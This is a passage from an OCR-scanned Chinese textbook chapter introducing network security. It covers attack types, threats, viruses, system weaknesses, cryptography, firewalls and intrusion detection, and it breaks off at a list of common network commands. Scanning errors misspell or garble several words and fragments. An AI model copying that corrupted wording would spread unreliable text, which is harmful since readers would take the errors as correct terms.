网 络 管理 员 发 现 问题 后 ， 往 往 因 为 安全 知识 的 不 足 导致 事件 迟 迟 不 能 被 处 理 ， 从 而 影 
响 网 络 的 安全 性 、 延 误 网 络 的 正常 使 用 。 


1.3 ”计算 机 网 络 安全 威胁 


安全 威胁 是 指 某 个 人 、 物 、 事 件 或 概念 对 某 一 资源 的 机 密 性 、 完 整 性 、 可 用 性 或 合法 
性 所 造成 的 危害 。 某 种 攻击 就 是 某 种 威胁 的 具体 实现 。 

安全 威胁 可 分 为 故意 的 (如 黑客 渗透 ) 和 偶然 的 (如 信息 被 发 往 错误 的 地 址 ) 两 类 。 故 意 威 
胁 又 可 进一步 分 为 被 动 和 主动 两 类 。 


1.3.1 对 网 络 安全 的 攻击 


1. 被 动 攻击 和 主动 攻击 

对 于 计算 机 或 网 络 安全 性 的 攻击 ， 一 般 是 通过 在 提供 信息 时 查看 计算 机 系统 的 功能 来 
记录 其 特性 。 当 信息 从 信 源 向 信 宿 流动 时 ， 图 1.2 中 列 出 了 信息 正常 流动 和 受到 各 种 类 型 
攻击 的 情况 。 


图 1.2 被 动 攻击 和 主动 攻击 
(D 中 断 是 指 系统 资源 遭 到 破坏 或 变 得 不 能 使 用 ， 这 是 对 可 用 性 的 攻击 ， 如 对 一 些 硬件 


进行 破坏 、 切 断 通信 线路 或 禁用 文件 管理 系统 。 
(2) 截获 是 指 未 授权 的 实体 得 到 了 资源 的 访问 权 ， 这 是 对 保密 性 的 攻击 。 未 授权 实体 
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可 能 是 一 个 人 、 一 段 程序 或 一 台 计 算 机 。 

(3) 自 改 是 指 未 授权 的 实体 不 仅 得 到 了 访问 权 ， 而 且 还 算 改 了 资源 ， 这 是 对 完整 性 的 
攻击 。 
(4) 伪造 是 指 未 授权 的 实体 向 系统 中 插入 伪造 的 对 象 ， 这 是 对 真实 性 的 攻击 。 

以 上 这 些 攻 击 可 分 为 被 动 攻击 和 主动 攻击 两 种 。 

被 动 攻击 的 特点 是 偷 听 或 监视 传送 ， 其 目的 是 获取 正在 传送 的 消息 ， 被 动 攻击 有 泄 
信息 内 容 和 通信 量 分 析 等 ， 泄 露 信息 内 容 容 易 理 解 ， 如 电话 对 话 、 电 子 邮件 消息 以 及 可 
含有 敏感 的 机 密 信 息 ， 要 防止 对 手 从 传送 中 获得 这 些 内 容 。 通 信 量 分 析 则 比较 微妙 ， 用 某 
种 方法 将 信息 内 容 隐藏 起 来 ， 常 用 的 技术 是 加 密 ， 这 样 即使 对 手 捕获 了 消息 ， 也 不 能 从 
提取 信息 。 对 手 可 以 确定 位 置 和 通信 主机 的 身份 ， 可 以 观察 交换 消息 的 频率 和 长 度 。 这 些 
信息 可 以 帮助 对 手 猜 测 正在 进行 的 通信 特性 。 
主动 攻击 涉及 修改 数据 或 创建 错误 的 数据 流 ， 它 包括 假冒 、 重 放 、 修 改 消息 和 拒绝 服 
务 等 。 假 冒 是 一 个 实体 假装 成 男 一 个 实体 ， 假 冒 攻 击 通 常 包 括 一 种 其 他 形式 的 主动 攻击 ; 
重 放 涉 及 被 动 捕获 数据 单元 及 其 后 来 的 重新 传送 ， 以 产生 未 经 授权 的 效果 ; 修改 消息 意味 
着 改变 了 真实 消息 的 部 分 内 容 ， 或 将 消息 延迟 或 重新 排序 ， 导 致 未 授权 的 操作 ;拒绝 服务 
是 指 禁止 对 通信 工具 的 正常 使 用 或 管理 ， 这 种 攻击 拥有 特定 的 目标 。 另 一 种 拒绝 服务 的 形 
式 是 整个 网 络 的 中 断 ， 这 可 以 通过 使 网 络 失效 而 实现 ， 或 通过 消息 过 载 使 网 络 性 能 降低 。 
主动 攻击 具有 与 被 动 攻击 相反 的 特点 ， 虽 然 很 难 检测 出 被 动 攻击 ， 但 可 以 采取 措施 防止 它 
的 成 功 。 相 反 ， 很 难 绝对 预防 主动 攻击 ， 因 为 这 需要 随时 对 所 有 的 通信 工具 和 路 径 进行 完 
全 的 保护 。 防 止 主动 攻击 的 做 法 是 对 攻击 进行 检测 ， 并 从 它 引起 的 中 断 或 延迟 中 恢复 过 
来 。 因 为 检测 具有 威慑 的 效果 ， 它 也 可 以 对 预防 做 出 贡献 。 


2. 服务 攻击 和 非 服务 攻击 


另外 ， 从 网 络 高 层 协议 的 角度 ， 攻 击 方法 可 以 概括 地 分 为 两 大 类 ， 即 服务 攻击 与 非 服 
务 攻击 。 

(1) 服务 攻击 (Application Dependent Attack) 是 针对 某 种 特定 网 络 服 务 的 攻击 ， 如 针对 
E-mail 服务 、Telnet、FTP、HTTP 等 服务 的 专门 攻击 。 目 前 Intemet 应 用 协议 集 ( 主 要 是 
TCP/IP 协议 集 ) 缺 乏 认 证 、 保 密 措施 ， 是 造成 服务 攻击 的 重要 原因 。 现 在 有 很 多 具体 的 攻 
击 工具 ， 如 Mail Bomb( 邮 件 炸 弹 ) 等 ， 可 以 很 容易 地 实施 对 某 项 服务 的 攻击 。 

(2) 非 服务 攻击 (Application Independent Attack) 不 针对 某 项 具体 应 用 服务 ， 而 是 基于 网 
络 层 等 低层 协议 而 进行 的 。TCP/IP 协议 (尤其 是 IPv4) 自 身 的 安全 机 制 不 足 为 攻击 者 提供 了 
方便 之 门 。 

与 服务 攻击 相 比 ， 非 服务 攻击 与 特定 服务 无 法 相 比 ， 它 往往 利用 协议 或 操作 系统 实现 
协议 时 的 漏洞 来 达到 攻击 的 目的 ， 更 为 隐蔽 ， 而 且 目 前 也 是 常常 被 忽略 的 方面 ， 因 而 被 认 
为 是 一 种 更 为 有 效 的 且 更 危险 的 攻击 手段 。 


1.3.2 ”基本 的 威胁 


网 络 安全 的 基本 目标 是 实现 信息 的 机 密 性 、 完 整 性 、 可 用 性 和 合法 性 。 以 下 4 个 基本 
的 安全 威胁 直接 针对 这 4 个 安全 目标 。 
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(1) 信息 泄露 或 丢失 。 它 指 敏感 数据 在 有 意 或 无 意 中 被 泄露 出 去 或 丢失 ， 它 通常 包括 
信息 在 传输 中 丢失 或 泄露 、 信 息 在 存储 介质 中 丢失 或 泄露 、 通 过 建立 隐蔽 通道 等 窃取 敏感 
信息 等 。 

(2) 破坏 数据 完整 性 。 这 是 指 以 非法 手段 窃 得 对 数据 的 使 用 权 ， 删 除 、 修 改 、 插 入 或 
重 发 某 些 重要 信息 ， 以 取得 有 益 于 攻击 者 的 响应 ; 恶意 添加 、 修 改 数据 ， 以 干扰 用 户 的 正 
常 使 用 。 

(3) 拒绝 服务 攻击 。 它 不 断 对 网 络 服务 系统 进行 干扰 ， 改 变 其 正常 的 作业 流程 ， 执 行 
无 关 程 序 使 系统 响应 减 慢 甚至 瘫痪 ， 影 响 正常 用 户 的 使 用 ， 甚 至 使 合法 用 户 被 排斥 而 不 能 
进入 计算 机 网 络 系统 或 不 能 得 到 相应 的 服务 。 

(4) 非 授权 访问 。 没 有 预先 经 过 同意 就 使 用 网 络 或 计算 机 资源 ， 被 看 作 是 非 授权 访 
问 ， 如 有 意 避 开 系 统 访问 控制 机 制 、 对 网 络 设备 及 资源 进行 非 正 常 使 用 或 擅自 扩大 权限 、 
越权 访问 信息 。 它 主要 有 假冒 、 身 份 攻击 、 非 法 用 户 进 入 网 络 系统 进行 违法 操作 、 合 法 计 
户 以 未 授权 方式 进行 操作 等 几 种 形式 。 


1.3.3 ”主要 的 可 实现 的 威胁 


这 些 威胁 使 基本 威胁 成 为 可 能 ， 所 以 十 分 重要 。 它 包括 两 类 ， 即 渗入 威胁 和 植 入 威胁 。 
1. 主要 的 渗入 威胁 


(1) 假冒 。 这 是 大 多 数 黑客 采用 的 攻击 方法 。 某 个 未 授权 实体 使 守卫 者 相信 它 是 一 个 
合法 的 实体 ， 从 而 搜 取 该 合法 用 户 的 特权 。 

(2) 旁 路 控制 。 攻 击 者 通过 各 种 手段 发 现 本 应 保密 却 又 暴露 出 来 的 一 些 系统 “ 特 
征 ”， 利 用 这 些 “ 特 征 ”， 攻 击 者 绕 过 防线 守卫 者 渗入 到 系统 内 部 。 

(3) 授权 侵犯 。 也 称 为 “内 部 威胁 ”， 授 权 用 户 将 其 权限 用 于 其 他 未 授权 的 目的 。 


2. 主要 的 植 入 威胁 


(1) 特洛伊 木马 。 攻 击 者 在 正常 的 软件 中 隐藏 一 段 用 于 其 他 目的 的 程序 ， 这 段 隐藏 的 
程序 段 常常 以 安全 攻击 作为 其 最 终 目 标 。 

(2) 后 门 。 后 门 是 在 某 个 系统 或 某 个 文件 中 设置 的 “机 关 ”， 使 得 当 提供 特定 的 输入 
数据 时 允许 违反 安全 策略 。 


1.3.4 ”病毒 


病毒 是 能 够 通过 修改 其 他 程序 而 “感染 ”它们 的 一 种 程序 ， 修 改 后 的 程序 里 包含 病毒 
程序 的 一 个 副本 ， 这 样 它们 就 能 够 继续 感染 其 他 程序 。 编 制 或 者 在 计算 机 程序 中 插入 的 破 
坏 计 算 机 功能 或 者 破坏 数据 ， 影 响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程 
序 代码 称 为 计算 机 病毒 (Computer Virus)， 它 具有 破坏 性 、 复 制 性 和 传染 性 。 
通过 网 络 传播 计算 机 病毒 ， 其 破坏 性 大 大 高 于 单机 系统 ， 而 且 用 户 很 难 防范 。 由 于 在 
网 络 环境 下 ， 计 算 机 病毒 有 不 可 估量 的 威胁 性 和 破坏 力 ， 因 此 ， 计 算 机 病毒 的 防范 是 网 络 
安全 性 建设 的 重要 内 容 。 

网 络 防 病毒 技术 包括 预防 病毒 、 检 测 病毒 和 清除 病毒 3 种 技术 。 
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(1) 预防 病毒 技术 。 它 通过 自身 常 驻 系统 内 存 ， 优 先 获 得 系统 的 控制 权 ， 来 监视 和 判 
断 系统 中 是 否 有 病毒 存在 ， 进 而 防止 计算 机 病毒 进入 计算 机 系统 和 对 系统 进行 破坏 。 这 类 
技术 有 加 密 可 执行 程序 、 引 导 区 保护 、 系 统 监控 与 读 写 控制 (如 防 病毒 卡 等 )。 

(2) 检测 病毒 技术 。 它 是 通过 计算 机 病毒 的 特征 来 进行 判断 的 技术 ， 如 自身 校 验 、 关 
键 字 、 文 件 长 度 的 变化 等 。 

(3) 清除 病毒 技术 。 它 通过 对 计算 机 病毒 进行 分 析 ， 开 发 出 能 删除 病毒 程序 并 恢复 原 
文件 的 软件 。 

网 络 防 病毒 技术 的 具体 实现 方法 包括 : 对 网 络 服务 器 中 的 文件 进行 频繁 地 扫描 和 监 
测 ;， 在 工作 站 上 用 防 病毒 芯片 和 对 网 络 目录 及 文件 设置 访问 权限 等 。 


1.4 ”影响 计算 机 网 络 安全 的 因素 


Intemet 在 其 早期 是 一 个 开放 的 为 研究 人 员 服 务 的 网 际 网 ， 是 非 营利 性 的 信息 共享 载 
体 ， 所 以 几乎 所 有 的 Internet 协议 都 没有 考虑 安全 机 制 。 这 一 点 从 Intemet 上 最 通用 的 应 
FTP、Telnet 和 电子 邮件 中 的 用 户口 令 的 明文 传输 以 及 人 P 报 文 在 子 网 段 上 的 广播 传递 能 
分 地 体现 出 来 。 只 是 近 些 年 来 ，Intemet 的 性 质 和 使 用 人 员 的 情况 发 生 了 很 大 的 变化 ， 使 得 
Internet 的 安全 问题 显得 越 来 越 突出 。 随 着 Internet 的 全 球 普及 和 商业 化 ， 用 户 越 来 越 私 人 
化 ， 如 信用 卡号 等 同 其 自身 利益 相关 的 信息 也 通过 Intemet 传输 ， 而 且 越 来 越 多 的 信息 放 在 
网 上 是 为 了 一 利 ， 并 不 是 完全 免费 的 信息 共享 ， 所 以 其 安全 性 也 成 为 人 们 日 益 关 注 的 问题 。 


1.4.1 计算 机 系统 因素 


计算 机 系统 的 脆弱 性 主要 来 自 于 操作 系统 的 不 安全 性 。 在 网 络 环境 下 ， 还 来 源 于 通信 
协议 的 不 安全 性 。 就 前 面 所 介绍 的 安全 等 级 而 言 ， 全 世界 达到 B3 的 系统 只 有 一 两 个 ， 达 
到 Al 级 别 的 操作 系统 目前 还 没有 。Windows XP、Windows Server 2003 和 Linux 操作 系统 
达到 了 C2 级 别 ， 但 仍然 存在 着 许多 安全 漏洞 。 
其 次 ， 每 一 个 计算 机 系统 都 存在 超级 用 户 ( 如 Linux 中 的 root、Windows Server 2003 中 
的 Administrator)， 如 果 入 侵 者 得 到 了 超级 用 户口 令 ， 整 个 系统 将 完全 受 控 于 入 侵 者 。 现 
在 ， 人 们 正在 研究 一 种 新 型 的 操作 系统 ， 在 这 种 操作 系统 中 没有 超级 用 户 ， 也 就 不 会 由 于 
有 超级 用 户 带 来 的 问题 。 现 在 很 多 系统 都 使 用 静态 口令 来 保护 系统 ， 但 口令 还 是 有 很 大 的 
破解 可 能 性 ， 而 且 不 好 的 口令 维护 制度 会 导致 口令 被 人 盗用 。 口 令 丢 失 也 就 意味 着 安全 系 
统 的 全 面 月 省。 

最 后 ， 计 算 机 可 能 会 因 硬件 或 软件 故障 而 停止 运转 ， 或 被 入 侵 者 利用 并 造成 损失 。 世 
界 上 没有 能 长 久 运行 的 计算 机 ， 计 算 机 可 能 会 因 硬件 或 软件 的 故障 而 停止 运转 ， 或 被 入 侵 
者 利用 而 造成 损失 。 硬 盘 故 障 、 电 源 故障 以 及 芯片 和 主板 故障 都 是 人 们 应 考虑 的 硬件 故障 
问题 ， 软 件 故障 则 可 能 出 现在 操作 系统 中 ， 也 可 能 出 现在 应 用 软件 中 。 


1.4.2 ”操作 系统 因素 


操作 系统 是 计算 机 重要 的 系统 软件 ， 它 控制 和 管理 计算 机 所 有 的 软 、 硬 件 资源 。 由 于 
操作 系统 的 重要 地 位 ， 攻 击 者 常常 以 操作 系统 为 主要 攻击 目标 。 入 侵 者 所 做 的 一 切 ， 也 大 
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都 是 围绕 着 这 个 中 心目 标的 。 


首先 ， 无 论 哪 一 种 操作 系统 ， 其 体系 结构 本 身 就 是 不 安全 的 一 种 因素 。 由 于 操作 系统 
的 程序 是 可 以 动态 链接 的 ， 包 括 IO 的 驱动 程序 与 系统 服务 都 可 以 用 打 补 丁 的 方法 升级 入 
进行 动态 链接 。 这 种 方法 不 仅 该 产品 的 厂商 可 以 使 用 ，“ 黑 客 ” 成 员 也 可 以 使 用 ， 这 种 动 
态 链接 方法 也 正 是 计算 机 病毒 产生 的 温床 。 操 作 系 统 支 持 的 程序 动态 链接 与 数据 动态 交换 
是 现代 系统 集成 和 系统 扩展 的 必 备 功能 ， 因 此 ， 这 是 相互 矛盾 的 两 个 方 

另 一 个 原因 在 于 它 可 以 创建 进程 ， 即使 在 网 络 的 节点 上 同样 也 可 以 进行 远程 进程 的 人 
建 与 激活 ， 更 重要 的 是 被 创建 的 进程 具有 可 以 继续 创建 进程 的 权力 。 这 一 点 加 上 操作 系统 支 
持 在 网 络 上 传输 文件 、 在 网 络 上 能 加 载 程序 ， 二 者 结合 起 来 就 构成 可 以 在 远 端 服务 器 上 安装 
“间谍 ”软件 的 条 件 。 如 果 把 这 种 “间谍 ” 软件 以 打 补丁 的 方式 “ 打 ” 入 合法 用 户 上 ， 尤 其 

是 “ 打 ” 在 特权 用 户 上 ， 那 么 系统 进程 与 作业 监视 程序 根本 监测 不 到 “间谍 ”的 存在 。 

操作 系统 中 通常 都 有 一 些 守 护 进程 ， 这 种 软件 实际 上 是 一 些 系统 进程 ， 它 们 总 是 等 待 
一 些 条 件 的 出 现 。 一 旦 这 些 条 件 出 现 ， 程 序 就 可 以 运行 下 去 ， 这 些 软件 常常 被 黑客 利用 。 
问题 不 在 于 有 没有 这 些 守护 进程 ， 而 在 于 它们 在 Linux、Windows 操作 系统 中 具有 与 其 他 
操作 系统 核心 层 软件 同等 的 权限 。 

最 后 ， 网 络 操作 系统 提供 的 远程 过 程 调用 (RPC) 服 务 以 及 它 所 安排 的 无 口令 入 口 也 是 
黑客 的 通道 。 操 作 系 统 都 提供 远程 进程 调用 服务 ， 而 它们 提供 的 安全 验证 功能 却 很 有 限 。 
操作 系统 有 Debug( 调 试 ) 和 Wizard( 向 导 ) 功 能 。 许 多 黑客 精通 这 些 功能 ， 利 用 这 些 技 
术 他 们 几乎 可 以 为 所 欲 为 。 操 作 系统 安排 的 口令 入 口 是 为 系统 开发 人 员 提供 的 便捷 入 口 ， 
但 也 经 常 被 黑客 所 利用 。 操 作 系 统 还 提供 了 隐蔽 的 通道 。 这 种 系统 不 但 复杂 而 且 存在 一 定 的 内 
在 危险 ， 和 危险 之 一 就 是 授权 进程 或 用 户 的 访问 权限 可 能 导致 用 户 得 到 限定 之 外 的 访问 权力 。 


1.4.3 ”人 为 因素 


所 有 的 网 络 系统 都 离 不 开 人 的 管理 ， 但 大 多 数 情况 下 又 缺少 安全 管理 员 ， 特 别 是 高 素 
质 的 网 络 管理 员 。 人 为 的 无 意 失误 是 造成 网 络 不 安全 的 重要 原因 。 网 络 管理 员 在 这 方面 不 
但 肩负 重任 ， 还 面临 着 越 来 越 大 的 压力 ， 稍 有 考虑 不 周 ， 安 全 方面 配置 不 当 ， 就 会 造成 安 
全 漏洞 。 另外， 用户 安全 意识 不 强 ， 不 按照 安全 规定 操作 ， 如 口令 选择 不 慎 、 将 自己 的 账 
户 随意 转借 他 人 或 与 别人 共享 都 会 给 网 络 安 全 带 来 威胁 。 


1.5 计算 机 网 络 安全 技术 


现在 ， 高 速 发 展 的 互联 网 已 经 深入 到 社会 生活 的 各 个 方面 。 对 个 人 而 言 ， 互 联网 已 使 
人 们 的 生活 方式 发 生 了 翻天 覆 地 的 变化 ， 对 企业 而 言 ， 互 联网 改变 了 企业 传统 的 营销 方式 
及 内 部 管理 机 制 。 但 是 ， 在 享受 信息 的 高 度 网 络 化 带 来 的 种 种 便利 之 时 ， 还 必须 应 对 随 之 
而 来 的 信息 安全 方面 的 种 种 挑战 ， 因 为 没有 安全 保障 的 网 络 可 以 说 是 一 座 空 中 楼 阅 ， 安 全 
性 已 逐渐 成 为 网 络 建设 的 第 一 要 素 。 特 别 是 随 着 网 络 规模 的 逐渐 扩大 、 所 存储 数据 的 逐渐 
增多 ， 使 用 者 要 想 确保 自己 的 资源 不 受到 非法 的 访问 与 自 改 ， 就 要 用 到 访问 控制 机 制 ， 这 
就 必须 掌握 一 些 相关 的 网 络 安全 技术 。 
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1.5.1 密码 学 


在 现实 世界 中 ， 安 全 是 一 个 相当 简单 的 概念 。 例 如 ， 在 房子 门窗 上 安装 足够 坚固 的 锁 
以 防止 窃贼 的 闻 入 ; 安装 报警 装置 以 防止 入 侵 者 破门 而 入 ; 银行 系统 必须 出 示 银 行 账户 的 
身份 证 明 来 保证 存款 安全 ; 签署 商业 合同 时 ， 需 要 双方 在 合同 上 签名 以 产生 法 律 效力 等 。 
同样 地 ， 在 数字 世界 中 ， 机 密 性 像 是 大 门 上 的 锁 ， 来 阻止 非法 者 疤 入 用 户 的 文件 夹 读 取 
户 的 敏感 数据 或 者 盗 取 钱 财 (如 信用 卡号 或 网 上 证 券 账 户 信息 )。 数 据 完整 性 提供 了 一 种 当 
某 些 内 容 被 修改 时 可 以 使 用 户 得 知 的 机 制 ， 类 似 于 报警 装置 。 通 过 认证 ， 可 以 验证 实体 的 
身份 ， 就 像 从 银行 取 钱 时 需要 用 户 提供 身份 证 一 样 。 基 于 密码 体制 的 数字 签名 具有 防 否认 
功能 ， 同 样 具有 法 律 效力 ， 可 使 人 们 遵守 数字 领域 的 承诺 。 

以 上 思想 是 密码 技术 在 保护 信息 安全 方面 所 起 作用 的 具体 体现 。 密 码 是 一 门 古老 的 技 
术 ， 但 自 密 码 技术 诞生 直至 第 二 次 世界 大 战 结 束 ， 对 于 公众 而 言 ， 密 码 技术 始终 处 于 一 种 
未 知 的 保密 状态 ， 与 军事 、 机 要 、 间 谍 等 工作 联系 在 一 起 ， 让 人 在 感到 神秘 之 余 又 有 几 分 
展 恨 。 信 息 技 术 的 迅速 发 展 改变 了 这 一 切 。 正 是 对 信息 的 机 密 性 和 真实 性 的 需求 ， 密 码 学 
才 逐 渐 揭 去 了 神秘 的 面纱 ， 走 进 公 众 的 日 常生 活 中 。 

如 何 保护 信息 的 安全 已 成 为 许多 人 感 兴趣 的 迫切 话题 ， 作 为 网 络 安全 理论 基础 之 一 的 
密码 学 引起 人 们 的 极 大 关注 ， 吸 引 着 越 来 越 多 的 科技 人 员 投 入 到 密码 学 领域 的 研究 之 中 。 
密码 技术 是 实现 网 络 安全 的 核心 技术 ， 是 保护 数据 最 重要 的 工具 之 一 。 通 过 加 密 变 换 ， 将 
可 读 的 文件 通过 某 种 算法 转换 成 一 段 无 法 识别 的 密 文 ， 从 而 起 到 保护 信息 \ 和 数据 的 作用 。 
它 直接 支持 机 密 性 、 完 整 性 和 非 否认 性 。 加 密 技 术 将 防止 数据 被 查看 或 修改 ， 并 在 不 安全 


的 信道 上 提供 安全 的 通信 信道 。 在 现代 加 密 体系 中 ， 算 法 的 私密 性 已 经 不 需要 了 ， 信 息 的 
安全 依赖 于 密 钥 的 保密 性 。 一 般 的 数据 加 密 模型 见 图 1.3。 
截取 者 


密 文 Y= Ex(X) 
解密 密 钥 有 


安全 信道 


图 1.3 一般 的 数据 加 密 模型 


数字 认证 技术 泛 指使 用 现代 计算 机 技术 和 网 络 技术 进行 的 认证 。 数 字 认 证 的 引入 对 社 
会 的 发 展 和 进步 有 很 大 帮助 ， 数 字 认 证 可 以 减少 运营 成 本 和 管理 费用 。 数 字 认 证 可 以 减少 
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金融 领域 中 的 多 重 现金 处 理 和 现金 其 诈 。 随 着 现代 网 络 技术 和 计算 机 技术 的 发 展 ， 数 字 其 
诈 现象 越 来 越 普 遍 ， 比 如 说 ， 用 户 名 下 文件 和 资金 传输 可 能 会 被 伪造 或 更 改 。 数 字 认 证 提 
供 了 一 种 机 制 使 用 户 能 证 明 其 发 出 信息 来 源 的 正确 性 和 发 出 信息 的 完整 性 。 数 字 认 证 的 另 
一 主要 作用 是 操作 系统 可 以 通过 它 来 实现 对 资源 的 访问 控制 。 


1.5.2 防火墙 


“防火 墙 ” 是 一 种 由 计算 机 硬件 和 软件 的 组 合 使 互联 网 与 内 部 网 之 间 建 立 起 一 个 安全 
网 关 (Security Gateway)， 从 而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 它 其 实 就 是 一 个 把 互联 网 
与 内 部 网 (通常 为 局 域 网 或 城 域 网 ) 隔 开 的 屏障 。 

防火 墙 作为 最 早出 现 的 网 络 安全 产品 和 使 用 量 最 大 的 安全 产品 ， 也 受到 用 户 和 研发 机 
构 的 青睐 。 以 往 在 没有 防火 墙 时 ， 局 域 网 内 部 上 的 每 个 节点 都 暴露 给 Intemet 上 的 其 他 主 
机 ， 此 时 局 域 网 的 安全 性 要 由 每 个 节点 的 坚固 程度 来 决定 ， 并 且 安 全 性 等 同 于 其 中 最 弱 的 
节点 。 而 防火 墙 是 放置 在 局 域 网 与 外 部 网 络 之 间 的 一 个 隔离 设备 ， 它 可 以 识别 并 屏蔽 非法 
请 求 ， 有 效 地 防止 超越 权限 的 数据 访问 。 防 火 墙 将 局 域 网 的 安全 性 统一 到 它 本 身 ， 网 络 安 
全 性 是 在 防火 墙 系统 上 得 到 加 固 ， 而 不 是 分 布 在 内 部 网 络 的 所 有 节点 上 ， 这 就 简化 了 局 域 
网 的 安全 管理 。 

防火 墙 是 由 软件 、 硬 件 构成 的 系统 ， 用 来 在 两 个 网 络 之 间 实 施 接 入 控制 策略 。 接 入 控 
制 策 略 是 由 使 用 防火 墙 的 单位 自行 制订 的 ， 为 的 是 可 以 最 适合 本 单位 的 需要 。 防 火 墙 内 的 
网 络 称 为 “可 信赖 的 网 络 ”(Trusted Network)， 而 将 外 部 的 Intemet 称 为 “不 可 信赖 的 网 
络 ”(Untrusted Network)。 防 火 墙 可 用 来 解决 内 联网 和 外 联网 的 安全 问题 。 设 立 防 火 墙 的 目 
的 是 保护 内 部 网 络 不 受 外 部 网 络 的 攻击 ， 以 及 防止 内 部 网 络 的 用 户 向 外 泄密 。 


1.5.3 ”入 侵 检测 


传统 上 ， 一 般 采用 防火 墙 作 为 系统 安全 的 第 一 道 屏 障 。 但 是 随 着 网 络 技术 的 高 速 发 
展 、 攻 击 者 技术 的 日 趋 成 熟 、 攻 击 手法 的 日 趋 多 样 ， 单 纯 的 防火 墙 已 经 不 能 很 好 地 完成 安 
全 防护 任务 。 入 侵 检测 技术 是 继 “ 防 火 墙 ”“ 数 据 加 密 ” 等 传统 安全 保护 措施 后 新 一 代 的 
安全 保障 技术 。 

入 侵 (Intrusion) 指 的 就 是 试图 破坏 计算 机 保密 性 、 完 整 性 、 可 用 性 或 可 控 性 的 一 系列 活 
动 。 入 侵 活动 包括 非 授 权 用 户 试 图 存 取 数据 、 处 理 数 据 或 者 妨碍 计算 机 的 正常 运行 。 入 侵 
检测 (Intrusion Detection) 是 对 入 侵 行 为 的 检测 ， 它 通过 收集 和 分 析 计 算 机 网 络 或 计算 机 系统 
中 若干 关键 点 的 信息 ， 检 查 网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 
入 侵 检测 作为 一 种 积极 主动 的 安全 防护 技术 ， 提 供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实 
时 保护 ， 在 网 络 系统 受到 危害 之 前 响应 入 侵 并 进行 拦截 。 下 面 介 绍 入 侵 检测 模型 的 分 类 。 

(1) 从 技术 上 划分 ， 入 侵 检测 有 两 种 检测 模型 。 

Q@ 异常 检测 模型 (Anomaly Detection)。 检 测 与 可 接受 行为 之 间 的 偏差 。 如 果 可 以 定义 
每 项 可 接受 的 行为 ， 那 么 每 项 不 可 接受 的 行为 就 应 该 是 入 侵 。 首 先 总 结 正常 操作 应 该 具有 
的 特征 (用 户 轮廓 )， 当 用 户 活动 与 正常 行为 有 重大 偏离 时 即 被 认为 是 入 侵 。 这 种 检测 模型 
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漏 报 率 低 ， 误 报 率 高 。 因 为 它 不 需要 对 每 种 入 侵 行为 进行 定义 ， 所 以 能 有 效 地 检测 未 知 的 
入 侵 。 

@ 误 用 检测 模型 (Misuse Detection)。 检 测 与 已 知 的 不 可 接受 行为 之 间 的 匹配 程度 。 如 
果 可 以 定义 所 有 的 不 可 接受 行为 ， 那 么 每 种 能 够 与 之 匹配 的 行为 都 会 引起 报警 。 收 集 非 正 
常 操作 的 行为 特征 ， 建 立 相关 的 特征 库 ， 当 监测 的 用 户 或 系统 行为 与 库 中 的 记录 相 匹 配 
时 ， 系 统 就 认为 这 种 行为 是 入 侵 。 这 种 检测 模型 误 报 率 低 、 漏 报 率 高 。 对 于 已 知 的 攻击 ， 
它 可 以 详细 、 准 确 地 报告 出 攻击 类 型 ， 但 是 对 未 知 攻击 却 效 果 有 限 ， 而 且 特 征 库 必须 不 断 
更 新 。 

(2) 按照 检测 对 象 划分 ， 入 侵 检测 有 3 种 模型 。 

@ 基于 主机 。 系 统 分 析 的 数据 是 计算 机 操作 系统 的 事件 日 志 、 应 用 程序 的 事件 日 
志 、 系 统 调用 、 端 口 调 用 和 安全 审计 记录 。 主 机 型 入 侵 检测 系统 保护 的 一 般 是 所 在 的 主 必 
系统 ， 是 由 代理 (Agent) 来 实现 的 。 代 理 是 运行 在 目标 主机 上 的 小 的 可 执行 程序 ， 它 们 与 命 
令 控 制 台 (Console) 通 信 。 

@ 基于 网 络 。 系 统 分 析 的 数据 是 网 络 上 的 数据 包 。 网 络 型 入 侵 检 测 系统 担负 着 保护 
整个 网 段 的 任务 ， 基 于 网 络 的 入 侵 检 测 系统 由 遍及 网 络 的 传感器 (Senson) 组 成 。 传 感 器 是 一 
台 将 以 太 网 卡 置 于 混杂 模式 的 计算 机 ， 用 于 嗅 探 网 络 上 的 数据 包 。 

@ 混合 型 。 基 于 网 络 和 基于 主机 的 入 侵 检测 系统 都 有 不 足 之 处 ， 会 造成 防御 体系 的 
不 全 面 ， 而 综合 了 基于 网 络 和 基于 主机 的 混合 型 入 侵 检 测 系统 既 可 以 发 现 网 络 中 的 攻击 信 
息 ， 也 可 以 从 系统 日 志 中 发 现 异常 情况 。 


1.5.4 ”计算 机 病毒 防治 


计算 机 病毒 是 一 种 在 计算 机 系统 运行 过 程 中 能 把 自身 精确 复制 或 有 修改 地 复制 到 其 他 
程序 内 的 程序 。 它 隐藏 在 计算 机 数据 资源 中 ， 利 用 系统 资源 进行 繁殖 ， 并 破坏 或 干扰 计算 
机 系统 的 正常 运行 。 

杀毒 软件 肯定 是 见得 最 多 、 用 得 最 为 普遍 的 安全 技术 方案 ， 因 为 这 种 技术 实现 起 来 最 
为 简单 ， 但 杀毒 软件 的 主要 功能 就 是 杀毒 ， 功 能 十 分 有 限 ， 不 能 完全 满足 网 络 安全 的 需 
要 。 这 种 方式 对 于 个 人 用 户 或 小 企业 或 许 还 能 满足 需要 ， 但 如 果 个 人 或 企业 有 电子 商务 方 
面 的 需求 ， 就 不 能 完全 满足 了 。 可 喜 的 是 随 着 杀毒 软件 技术 的 不 断 发 展 ， 现 在 的 主流 杀毒 
软件 同时 还 可 以 预防 木马 及 其 他 的 一 些 黑客 程序 的 入 侵 。 还 有 的 杀毒 软件 开发 商 同时 提供 
了 软件 防火 墙 ， 具 有 一 定 防火 墙 功能 ， 在 一 定 程度 上 能 起 到 硬件 防火 墙 的 功效 ， 如 
KV3000、 金 山 防 火 墙 、Norton 防火 墙 等 。 


1.5.5 ”网 络 安全 常用 命令 


下 面 介 绍 一 些 常用 的 网 络 命令 ， 包 括 ping、ipconfig、arp、nbtstat、netstat、tracert、 
net、at、route、nslookup、ftp、telnet 和 DIR。 

1. ping 

ping 是 使 用 频率 极 高 的 用 来 检查 网 络 是 否 通畅 或 者 网 络 连接 速度 快慢 的 网 络 命令 ， 堪 


.TAN 
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目的 就 是 通过 发 送 特定 形式 的 ICMP 包 来 请 求 主机 的 回应 ， 进 而 获得 主机 的 一 些 属性 。 用 
